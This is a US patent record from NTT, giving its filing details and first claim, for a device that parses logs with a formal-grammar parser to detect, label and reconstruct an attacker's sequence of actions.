US 11,907,365 B2
Information processing device and information processing program
Nariyoshi Chida, Musashino (JP); Yo Kanemoto, Musashino (JP); and Kazufumi Aoki, Musashino (JP)
Assigned to NIPPON TELEGRAPH AND TELEPHONE CORPORATION, Tokyo (JP)
Appl. No. 17/283,552
Filed by NIPPON TELEGRAPH AND TELEPHONE CORPORATION, Tokyo (JP)
PCT Filed May 20, 2019, PCT No. PCT/JP2019/019976
§ 371(c)(1), (2) Date Apr. 8, 2021,
PCT Pub. No. WO2020/075333, PCT Pub. Date Apr. 16, 2020.
Claims priority of application No. 2018-192048 (JP), filed on Oct. 10, 2018.
Prior Publication US 2021/0390178 A1, Dec. 16, 2021
Int. Cl. G06F 21/55 (2013.01); G06F 40/205 (2020.01); H04L 9/40 (2022.01)
CPC G06F 21/55 (2013.01) [G06F 40/205 (2020.01); H04L 63/1416 (2013.01); H04L 63/1425 (2013.01); G06F 2221/034 (2013.01)] 4 Claims
OG exemplary drawing
 
1. An information processing device comprising:
a memory; and
a processor coupled to the memory and programmed to execute a process comprising:
extracting elements relating to actions of an attacker from each input log;
generating a parser based on definition information that defines the actions of the attacker in a formal grammar, the parser being configured to detect, from a log, a log string having a feature corresponding to an action defined by the definition information;
detecting, from a log consisting of the elements extracted by the extracting, log strings having features corresponding to the actions defined by the definition information by using the parser; and
reconstructing the log strings detected by the detecting, add a label indicating an action defined by the definition information to each of the reconstructed log strings, and output the labeled log strings as a log corresponding to a series of actions of the attacker.